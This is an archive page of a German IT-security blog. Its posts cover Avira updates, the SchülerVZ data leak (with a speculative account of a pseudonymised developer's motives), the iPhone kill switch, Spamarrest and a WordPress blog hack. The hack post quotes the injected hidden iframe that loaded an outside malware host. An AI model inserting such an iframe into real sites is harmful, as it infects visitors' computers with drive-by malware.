Seit einigen Tagen ist mir bereits aufgefallen, dass Updates beim Avira Personal, also der kostenlosen Version, extrem lange dauern. Im Schnitt dauert es erst einmal 25 Minuten, bis die Updates gefunden werden. Der Download anschließend tröpfelt nur so durch die Leitung.
Dieses Verhalten beobachte ich erst seit einigen Tagen, zuvor war das nie ein ernst zu nehmendes Problem.
Zwar heisst es immer, einem geschenkten Gaul schaut man nicht ins Maul, aber in diesem Zustand gleicht das Programm eher einer Zumutung. Wenn man ein so wichtiges Produkt schon kostenlos verteilt, sollte wenigstens auch die extrem wichtigen und regelmäßiges Updates in einer akzeptablen Geschwindigkeit zu erhalten sein.
Bsp. hat ein gerade laufendes Update jetzt gerade knapp 45 Minuten gebraucht.
Archiv für die Kategorie ‘IT-Sicherheit’
Avira Personal – schleppende Updates
Donnerstag, 05. November 2009Helden und deren Motive – ein Blick hinter den SchülerVZ Datenskandal
Dienstag, 27. Oktober 2009Mitte Oktober schlug die Nachricht, dass durch ein großes Sicherheitsloch im SchülerVZ-Netzwerk Datensätze von einem Viertel der dort angemeldeten Nutzer dem Betreiber abhanden gekommen waren, große Wellen.
Netzpolitik.org meldete:
Heute meldet netzpolitik.org
Die Helden der Aufdeckung des Datenskandals wollen also gefeiert werden, haben aber Angst vor Repressalien?
Doch haben Helden mit hehren Motiven überhaupt etwas zu befüchten ?
Wenn man anhand des Textes dieses PDF Dokuments etwas nachforscht, finden sich überaus interessante Informationen, die, fügt man diese chronologisch aneinander, ein etwas anderes Bild eines möglichen Motivs vermitteln könnten.
Der Versuch einer Timeline
TICKERTICKERTICKERTICKDITACK
(sich bitte hier das Geräusch eines Nachrichtentickers vorstellen, welchen investigative Nachrichtensender des ÖR-Fernsehens Zwecks des besseren Effekts gerne einfügen)
2. Mai 2009
Max (Name geändert) veröffentlicht auf download.chip.eu ein selbstgeschriebenes Tool Namens “SchülerVZ Fotodownload 2.0″:
“Mit dem SchuelerVZ Fotodownload-Tool lassen sich SchuelerVZ Alben mit nur einem Klick herunterladen.”
Als Homepage des Entwicklers wird die Seite Foto-downloader.org genannt. Eigentümer dieser Seite: Max
TICKERTICKERTICKERTICKDITACK
14. September 2009
In einem Beitrag auf Progmatic.de, dessen Inhaber Max ist, und auf den die Seite Foto-downloader.org umgeleitet wird, ist unter der Überschrift “Beschwerde von VZnet Netzwerke Ltd. (ehemals StudiVZ Ltd.)” zu lesen:
“Aufgrund von Forderungen der VZnet Netzwerke Ltd. (früher StudiVZ Ltd.), verantwortlich für SchülerVZ.net sind die von mir für SchülerVZ.net veröffentlichten Programme nicht mehr in der aktuellen Form auf dieser Seite zu beziehen.”
TICKERTICKERTICKERTICKDITACK
2. Oktober 2009
Auf dem Blog Piratesparty.wordpress.com wird in dem Beitrag “SchuelerVZ – ein Facebook-Klon mit Maengeln” die wortgleiche Erklärung, die heute auf netzpolitik.org in Form eines PDF Files veröffentlicht wurde, online gestellt. Den Kommentaren kann man entnehmen, dass der Beitrag nach dem 11. Oktober irgendwann wieder auf Entwurf gestellt wurde, um dann wahrscheinlich am 21. Oktober wieder online gestellt zu werden. Die Gründe:
TICKERTICKERTICKERTICKDITACK
16. Oktober 2009
Netzpolitik.org veröffentlicht ihren Bericht über die Sicherheitslücke bei SchülerVZ. Die Geschichte nimmt ihren Lauf….
Zusammenfassung
Max wird von Betreibern von SchülerVZ untersagt, sein Programm “SchülerVZ Fotodownload” weiter zum Download anzubieten.
Daraufhin schreibt anscheinend Max oder einer seiner Kumpels ein “Programm”, mit welchem im SchülerVZ Netzwerk die Daten von über 1 Million Usern ausgelesen werden. Aus Angst, dass das eigene “Gutachten” zu wenig Beachtung findet, während SchülerVZ die Sicherheitslücke schließt, wird es wieder offline genommen.
Danach wendet man sich an ein recht bekanntes Blog netzpolitik.org, welches man nun für sein angeblich so ehrbares Ziel, nur auf eine Sicherheitslücke aufmerksam machen zu wollen, nutzt. Über netzpolitik.org verbreitet sich die Nachricht weiter über Golem, Heise bis zu Spiegel Online.
Leider wurde dann ein zweiter Mensch, der das Sicherheitsleck auch schon entdeckt hatte, bei dem Versuch, 80.000 EUR von SchülerVZ zu erpressen, festgenommen.
Anscheinend eingeschüchtert über die Tragweite der Lage wird das Gutachten beschnitten und “anonym” wiederum über Netzpolitik.org veröffentlicht.
Fazit: (K)eine Frage der Ehre !?
Keine Frage, das Aufdecken und Schließen von Sicherheitslücken ist von Grund auf ein gutes Anliegen. Die Historie hinter dem aktuellen Fall lässt jedoch viel Spielraum für Interpretationen, was die wahren Motive angehen könnte.
War es verletzter Stolz? Wollte man sich bei SchülerVZ dafür revanchieren, dass diese einem das Verbreiten eines selbst geschriebenen Programms untersagt haben?
Hat man netzpolitik.org aus Angst, dass das eigene Blog nicht genug Beachtung findet und SchülerVZ inzwischen die Lücke schließen könnte, instrumentalisiert?
Allein der Kommentar in dem Blog piratesparty.wordpress.com lässt darauf schließen, dass man mitnichten davon ausging, das SchülerVZ die Warnungen ignorierte. Man hatte eher Angst, dass sie reagierten und das eigene “Gutachten” danach nichts mehr wert sein könnte und man so nicht die gewünschte Beachtung erhielte.
Betrachtet man diese Hintergründe, tun sich viele neue Fragen auf:
- Mussten erst wirklich die Daten von 1 Million Usern des Netzwerks SchülerVZ entwendet werden, um auf eine Sicherheitslücke hinzuweisen? Hätte da nicht auch ein wesentlich kleinerer und ungefährlicherer Datenbestand gereicht?
- Hätte man auch dann die Sicherheitslücke öffentlich gemacht, wenn das Verbreiten des Programms “SchülerVZ Fotodownload” nicht untersagt worden wäre?
- Wäre das einzige Ziel gewesen, die Sicherheitslücke zu schließen, hätte man dann nicht anders agiert?!
Wenn das Handeln wirklich aus niederen Beweggründen geschah, hat man dann ein Anrecht auf Ruhm ?
WLAN Treiber Toshiba Satellite Pro 6100
Mittwoch, 23. September 2009Auf der Website von Toshiba findet man leider nur noch einen recht alten WLAN-Treiber für die im Notebook Toshiba Satellite Pro 6100 verbaute WLAN-Karte (Hersteller Agere ?). Sowohl dieser Treiber als auch der von Windows XP SP3 mitgelieferte können leider nur eine WLAN-Verschlüsselung WEP.
Auf der Suche nach Alternativen habe ich einen aktualisierten Treiber für die Karte gefunden, der zumindest die Verschlüsselung mit WPA-TKIP erlaubt. Damit kann man die betagte Karte jetzt halbwegs sicher im WLAN betreiben.
Das Treiberpaket hat den Dateinamen windows_drivers_sr02-2.3.zip.
Das Paket gibt es derzeit bei Steve zum Download. Im Notfall findet Google noch weitere Downloadquellen.
Telekom bekräftigt Anspruch auf konkrete Auskünfte
Donnerstag, 27. November 2008Die Telekom hat auf einen Bericht von SPIEGEL ONLINE reagiert, der deutliche Defizite bei der Hotline zum Datenskandal aufgezeigt hatte. Die sollte Kunden angeblich Auskunft erteilen, ob sie persönlich von Datenweitergaben betroffen waren. Das soll jetzt schriftlich oder per Mail ermöglicht werden.
Den ganzen Artikel bei Spiegel Online lesen …
TELEKOM-DATENSKANDAL: T-Mobile verweigert Kunden konkrete Auskünfte
Montag, 17. November 2008Mehr Transparenz hatte Telekom-Chef René Obermann nach den Datenskandalen öffentlich gelobt – doch den Kunden gegenüber wird gemauert. Die Firma verweist auf die Hotline, die aber führt im SPIEGEL-ONLINE-Test auch mit viel Geduld nicht zu neuen Erkenntnissen.
Den ganzen Artikel bei Spiegel Online lesen …
Spamarrest.com – what a f*cking idiotic idea
Dienstag, 23. September 2008Was ist noch lästiger als Spam? Antwort: Spamarrest.com
Wenn man diesen Dienst in Anspruch nimmt, wird man nie wieder Spam erhalten. Die Wahrscheinlichkeit ist jedoch hoch, dass man dann auch nie wieder überhaupt eine Mail erhält.
Schickt ein Unbekannter an den Empfänger, der diesen Dienst nutzt, eine Mail, wird seine Mail erst einmal unter Spamverdacht gestellt und er erhält folgende Rückantwort:
“Please click the link below to complete the verification process.
You have to do this only once.”
Doch das Anklicken eines Links reicht nicht aus.
“When you click the above link, you will be taken to a page
with a graphic on it. Simply read the word in the graphic,
type it into the form, and you’re verified.”
Aha, also wenn ich an so jemanden eine Mail schicke, muss ich also erst mal einen Link anklicken und dann noch eine Grafik enträtseln. WOW.
Das wäre ja noch zu schaffen, doch wer Spamarrest.com nicht kennt, wird erst mal Minuten damit verbringen, zu ermitteln, was das überhaupt ist, um sicher zu gehen, dass er sich mit dem Anklicken des Links nicht irgend etwas einfängt oder mit dem Ausfüllen der Grafik nicht irgendwelchen Spambots die Arbeit abnimmt.
Wie kann man so etwas nur einsetzen? Das ist für den Absender nicht nur eine Zumutung. Wer so etwas einsetzt, hat das Prinzip E-Mail in meinen Augen nicht verstanden.
Ach ja, bei meiner Mail ging es um ein Blog, welches sich Schadcode eingefangen hat. Mit der Mail wollte ich den Betreiber darüber informieren. Kann ihm ja nicht schaden – Schadcode auf dem Blog gefährdet ja nicht nur die Leser – Suchmaschinen mögen das auch nicht unbedingt und werfen dann solche Seiten gerne mal aus deren Index.
Egal, rufe ich den Helden morgen halt mal an und kläre das am Telefon – wenn ich seine Rufnummer herausfinde. Laut Impressum hat er kein Telefon und im Telefonbuch steht er auch nicht. Und das bei einer Business-Webseite. Das Ganze kommt mir reichlich paranoid vor.
Zur Not schreibe ich ihm einen Brief. Oder muss ich dazu bei der Post dann eine Urinprobe abgeben?
iPhone mit Killerapplikation und alle schauen weg
Dienstag, 12. August 2008Wir müssen da nochmal drüber reden, glaube ich.
Also, das iPhone verfügt über eine Funktionalität, die Apple die Möglichkeit gibt, auf sämtlichen iPhones dieser Welt gezielt Applikationen zu löschen.
Diese Funktionalität wurde nie beworben und sie wurden anscheinend auch nirgends für die iPhone-Kunden einsehbar dokumentiert. “Gekauft” und bezahlt haben sie die iPhone-Kunden dennoch.
Erst Jonathan Zdziarski entdeckte sie und Apple bestätigte.
Nun kann man sich auf den Standpunkt stellen, dass dies ja nur die Sicherheit für die Apple-Kunden vor Schadsoftware erhöht.
Doch die Gefahren und Risiken sind in meinen Augen weit größer.
Was wenn jemand diese Blacklist-Seite hackt und sich den Spaß erlaubt, mal geschwind die Liste der Software auszufüllen? Dank dem Dilettantismus von Apple, die URL der Webseite nicht gut genug in der iPhone Software zu verstecken, weiß nun die ganze Welt deren Adresse.
Oder was, wenn ein unzufriedener Applemitarbeiter sich an der Liste zu schaffen macht.
An die Möglichkeit, dass Apple sich so unerwünschter Software, die gar kein Schadenspotential hat, entledigt, mag ich gar nicht denken.
Natürlich gibt es noch die Möglichkeit, den Traffic gezielt auf eine andere Webseite umzulenken. Das Internet hat bekanntermaßen derzeit ein DNS-Problem.
Oder ein kleverer Programmierer schreibt eine Schadsoftware, die den Traffic direkt auf den iPhones auf die eigene Seite umlenkt. Dann ist die Funktionalität nix mehr wert.
Die Verhältnismäßigkeit dieser Maßnahme zu eventuellen Gefahren stimmt einfach nicht.
Eine Schadsoftware, die vielleicht einige hundert oder tausend iPhone-Kunden sich auf ihr Gerät laden, kann eben erst mal nur auf diesen hundert oder tausend iPhones einen Schaden anrichten.
Wird die Blacklist missbraucht oder schleicht sich ein Fehler ein, sind alle iPhones dieser Welt, und das sind Millionen, davon betroffen.
Alles Risiken, die bisher noch nicht abzuschätzen sind.
Nun, wäre diese Funktionalität eine von Microsoft und wäre diese in Vista oder XP integriert, wäre das Netz voll von Häme der Apple-User – und das zu Recht. Doch, oh what a shame, ihre Gottheit selbst hat ihnen diese Killerfunktionalität beschert. Und daher schweigen (fast) alle, oder schauen zumindest weg.
Schauen wir mal, was die Mac- und Apple-Webseiten, die ihre Leser u.a. mit News aus der Apple-Welt versorgen, so darüber schreiben. Einige Beispiele:
Mac Essentials: [...] “Falls ein gut getarnter Virus doch auf die iPhones gelangt, hat der »Kill Switch« als Notbremse durchaus seinen Sinn.”
Macnews.de ist es immerhin eine Kurznachricht wert.
Bei Macwelt.de und bei Macnotes.de habe ich bisher nichts gefunden.
Keine Spur von kritischem Umgang mit dieser Funktionalität. Die Seiten machen in meinen Augen derzeit einen schlechten Job.
Und was machen die meisten iPhone-Besitzer? Wegschauen und Kopf in den Sand stecken!
Wer es nicht glauben mag, liest bei Udo Vetter, für den sich das iPhone erledigt hat, mal die eine oder andere dämliche Rechtfertigung oder Verteidigung von Apple-Jüngern in den Kommentaren durch.
Lanu sagt es da schon deutlicher: “Sagt mal, ihr Apple-Pfeifen, was wollt ihr euch denn von Steve Jobs noch alles gefallen lassen?”
“Nur fünf Minuten, bis ein ungepatchter Windows PC kompromittiert wird”
Donnerstag, 24. Juli 2008Bei Heise Security erschien gerade ein Kommentar über die immer wiederkehrende Halbwahrheit, dass ein ungepatchter Windows PC innerhalb weniger Minuten im Internet kompromittiert wird.
Heise straft dieses “Gerücht” mit
“bestenfalls Unfug, in manchen Fällen aber auch bewusstes Reiten der Panikwelle”
ab. Heise behauptet, dass dieses Problem spätestens mit erscheinen von Windows XP SP2 und der darin enthaltenen Firewall behoben worden wäre.
Im Prinzip gebe ich Heise da recht, aber nicht in allen Punkten. Die Situation wurde alleine durch den Umstand, dass mittlerweile fast ausschließlich Breitbandverbindungen ins Internet genutzt werden und diese normalerweile einen Router mit eingebauter Firewall vorgeschaltet haben, drastisch entschärft.
Aber die Firewall, sei es Desktop (bzw. Personal), Router oder dedizierte Firewall verschließt nicht alle Infektionswege. Es sind noch massenweise Systeme im Einsatz, die eben kein SP2 installiert haben und die keine regelmäßigen Windows-Updates durchführen. Als klassisches Beispiel könnte man die gecrackte Windows XP Version nennen, die ohne Service Pack laüft und auch nicht upgedated werden kann.
Es sind immer noch veraltete Browserversionen und veraltete Virenscanner im Einsatz, die zu einer Kompromittierung beitragen. Wer denkt, mit einer Firewall wären alle Probleme gelöst, der irrt ganz einfach.
Daher reden wir meiner Meinung nach vielleicht nicht von 5 Minuten, bis ein ungepatchter Windows PC kompromittiert ist, aber es dauert sicherlich nur wenige Stunden, bis sich der PC eine Erkältung einfängt.
Basic Thinking hacked
Donnerstag, 05. Juni 2008Das Blog von Robert Basic wurde gehacked.
Er hat es mittlerweile auf die neueste Wordpress Version neu aufgesetzt.
Wie er gehacked wurde, erklärt er wie folgt:
1. Hacker hat in die Datei wp-includes/template-functions-general.php folgenden Code eingeschleust (links die gehackte Datei, rechts das Original der WP-Version 2.0.7)
2. Somit wurde folgende Codezeile beim Generieren aller Blogseiten erzeugt:
iframe src=http://googlerank.info width=1 height=1 style=display:none
3. Wer die Startseite basicthinking.de mit einem ungeschützten PC besucht hat, vaD über ältere IE-Browser, war geküsst, da er sich damit einen Virus eingfangen hat (denn die infizierte Seite wurde per iframe mit geladen). Ohne dass der User vom vorigen Artikel gewusst hatte, rief er mich rein zufällig vorhin an, seine Tochter habe meine Startseite besucht und danach sei der PC verseucht gewesen. Das hat ihn mehrere Stunden gekostet, den PC wieder neu aufzusetzen. I’m very sorry. Surft man die besagte Domain mit einem sichereren Browser an, zB FF 3, wird die Seite geblockt.
Weitere Details finden sich in seinem Blog.
Normalerweise würde ich ja sagen: Kommt schon mal vor.
Doch da Robert in weiser Voraussicht im Mai noch einen Artikel über Wordpress Sicherheit verfasst hat, finde ich das jetzt schon etwas peinlich. 
Na ja, ok: Kommt schon mal vor!
So, genug gestichelt. Wenn wir mal gehacked werden, steht ihm dafür eine Retourkutsche zu. Versprochen. 
Wichtig: Wordpress aktuell halten!
Wie das Beispiel von Roberts Blog zeigt, kann man sein System eigentlich nie aktuell genug halten.
Übrigens gibt es immer noch eine Menge Blogs, die auf alten Wordpress Versionen laufen.
Ein aktuelles und prominentes Beispiel: Macnotes.de
Die Seiten von Macnotes läuft derzeit laut Quellcode noch auf WordPress 2.3.3.
Welche Schlafmütze kümmert sich dort eigentlich um die Server und die Seite?
Noch ein Tip:
Wir vergleichen unsere regelmäßigen Datensicherungen der Dateien immer wieder mit dem Original bzw. mit älteren Ständen. So sollten wir, zumindest hoffen wir das, es merken, wenn jemand uns Code unterjubelt. Gegen andere Hacks, die direkt in die Datenbank schreiben, hilft das natürlich nicht.